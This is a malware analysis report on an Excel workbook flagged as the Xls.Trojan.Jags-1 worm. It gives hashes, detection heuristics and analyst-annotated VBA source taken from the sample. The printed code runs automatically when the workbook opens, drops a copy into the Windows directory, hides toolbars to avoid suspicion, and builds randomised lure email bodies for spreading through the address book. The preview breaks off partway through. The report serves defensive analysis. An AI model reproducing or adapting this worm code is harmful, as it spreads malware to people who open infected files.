Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9024afe4facc677…

MALICIOUS

Office (OLE)

97.5 KB Created: 1999-11-25 00:52:00 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 687ec01c79a4755262e5c0e3af44a987 SHA-1: 34e84e696e9c67642c1e14562e357a378b91cdad SHA-256: c9024afe4facc67763e28c8f74cee46c4332152c03cb602f215b97b6e45c3bb3
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File

The critical ClamAV heuristic indicates this sample is detected as 'Xls.Trojan.Jags-1'. In the extracted VBA source, the Workbook_Open handler calls Initialize, which saves a copy of the workbook into the Windows directory under the current user's name and then runs a set of helper routines (one of which is annotated by the author as sending the worm via the address book); 'macros.bas' is the name of the artifact carved by the analysis tooling, not a file the macro itself writes. This behavior strongly suggests the intent is self-replication and execution of a further payload, a common tactic for malware.

Heuristics 4

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This heuristic covers documents that carry only p-code, or whose source extraction failed, so that no readable macro source is available.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30247 bytes
SHA-256: af3b890d293b7665a7b287d9d91c7a9789dddd182d4133b14fcc110fdfbcdff6
Detection
ClamAV: Xls.Trojan.Jags-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Initialize()
On Error Resume Next
'NOTE(analysis): every error in this routine is suppressed, so a failing step is silently skipped rather than aborting the macro.

'"our polymorphic technique" (orig: nuestra tecnica polimorfica)
'Drops a copy of the current workbook into the Windows directory, named after the current Windows user (see OBTENER_DIR_WINDOWS / UsuarioActual below).
Application.ActiveWorkbook.SaveCopyAs (OBTENER_DIR_WINDOWS & "\" & UsuarioActual & ".xls")
'"we disable (these) to get in" (orig: desactivamos para entrar)
'The four helpers called here are defined outside this excerpt; their names suggest hotkey/toolbar hiding and a file association step.
Call UNLOAD_HOTKEYS
Call Ocultar_Barra
Call ASOCIAR_JAGS90
Call Read_Your_BookAddress 'WE SEND THE WORM (orig: ENVIAMOS EL GUSANO) -- propagation routine, body not in this excerpt
'"we re-enable so as not to leave suspicion" (orig: activamos para no dejar sospecha)
Call LOAD_HOTKEYS
Call Mostrar_Barra
End Sub

'Auto-execution entry point: Excel runs this when the workbook is opened (macros enabled).
'Uses the presence of any .xls file in the Windows directory as an "already installed" marker;
'only runs Initialize (the drop/propagation routine) when no such file exists, then shows UserForm1 as a decoy.
Private Sub Workbook_Open()
 If (Dir(OBTENER_DIR_WINDOWS & "\*.xls", vbArchive) = "") Then
   Call Initialize
 End If
 
 UserForm1.Show
End Sub

Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Empty sheet event handler (auto-generated stub); no behavior.
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)

End Sub

Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "get_win_directory"
'GET THE WINDOWS DIRECTORY (orig: OBTENER EL DIRECTORIO WINDOWS)
'Win32 import of GetWindowsDirectoryA from kernel32; used only by OBTENER_DIR_WINDOWS below.
Declare Function GetWindowsDirectory Lib "Kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

'Returns the Windows directory path (e.g. C:\WINDOWS) via the GetWindowsDirectoryA import.
'Returns "" if the API call does not produce a NUL-terminated string (errors are suppressed).
Function OBTENER_DIR_WINDOWS() As String
On Error Resume Next

'GET WINDOWS DIR (orig: OBTENER DIR WINDOWS)
Dim WinDir As String
Dim Cadena As String
Dim ret As Long

'WE GET THE DIR (orig: OBTENEMOS EL DIR)
    'Fixed 300-byte NUL-filled buffer; the API writes the path into it.
    Cadena = String$(300, Chr$(0))
    ret = GetWindowsDirectory(Cadena, Len(Cadena))
    'Cut at the first NUL. If no NUL is found, InStr returns 0 and Left$ with -1 raises an error
    'that On Error Resume Next swallows, leaving WinDir empty. The API return value (ret) is never checked.
    WinDir = Left$(Cadena, InStr(Cadena, Chr$(0)) - 1)
    
    OBTENER_DIR_WINDOWS = WinDir

End Function



Attribute VB_Name = "get_win_user"
'TO GET THE WINDOWS USER NAME (orig: PARA OBTENER EL NOMBRE DE USUARIO DE WINDOWS)
'Win32 import of GetUserNameA from advapi32; nSize is passed ByRef so the API can write back the length.
Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, nSize As Long) As Long


'OBTIENE EL NOMBRE DEL USUARIO ACTUAL DE WINDOWS

'Returns the current Windows user name via GetUserNameA, falling back to the Excel
'Application.UserName when the API reports a zero length. Used by Initialize to name the dropped copy.
Public Function UsuarioActual() As String
    On Error Resume Next
    
    Dim sBuffer As String
    Dim lSize As Long
    Dim sUsuario As String
    
    sBuffer = Space$(260)
    lSize = Len(sBuffer)
    'The function's return value is ignored; only the ByRef lSize written back by the API is used.
    Call GetUserName(sBuffer, lSize)
    If lSize > 0 Then
        sUsuario = Left$(sBuffer, lSize)
        'Strip the trailing CHR$(0) (orig: Quitarle el CHR$(0) del final...)
        lSize = InStr(sUsuario, Chr$(0))
        If lSize Then
            sUsuario = Left$(sUsuario, lSize - 1)
        End If
    Else
        'Fallback to the name configured in Excel's options.
        sUsuario = Application.UserName
    End If
    UsuarioActual = sUsuario
End Function



Attribute VB_Name = "jags90_others"
'obtiene el nombre de la #$#%# base de datos


'"random" (orig: aleatorio). Sums `hasta` draws of Rnd() (each in [0,1)) and returns the sum
'converted to Long, i.e. rounded to an integer roughly in the range 0..hasta.
'Randomize is re-seeded on every iteration; the result is not uniformly distributed.
Function aleatorio(hasta As Integer) As Long
Dim x, num
num = 0

  For x = 1 To hasta
    Randomize
    num = num + Rnd()
  Next x
  
  aleatorio = num
End Function

'Builds a pseudo-random name used for the author's "polymorphic" naming:
'a length of aleatorio(12)+1 characters, each Chr(aleatorio(23)+64), i.e. drawn from
'the ASCII range 64..87 ('@'..'W'). The result keeps the space padding of the
'fixed-width `texto` literal after the generated characters (it is not trimmed).
Function PolyName() As String
 Dim texto, x, hasta
 hasta = aleatorio(12) + 1
 texto = "                   "
 
 For x = 1 To hasta
   Mid$(texto, x, 1) = Chr(aleatorio(23) + 64)
 Next x
 
 PolyName = texto
End Function


Attribute VB_Name = "read_address_book"

Private Function PolyBody() As String
Dim op
op = aleatorio(1)
If (op = 0) Then
  PolyBody = ""
Else
  op = aleatorio(9)
  Select Case op
    Case Is = 0
        PolyBody = "A Greeting Card of: "
    Case Is = 1
        PolyBody = "Animated Card's "
    Case Is = 2
        PolyBody = "Top Secret FBI Information "
    Case Is = 3
        PolyBody = "HEEEEELP ME..!  "
    Case Is = 4
        PolyBody = "FEEDBACK Informatio
... (truncated)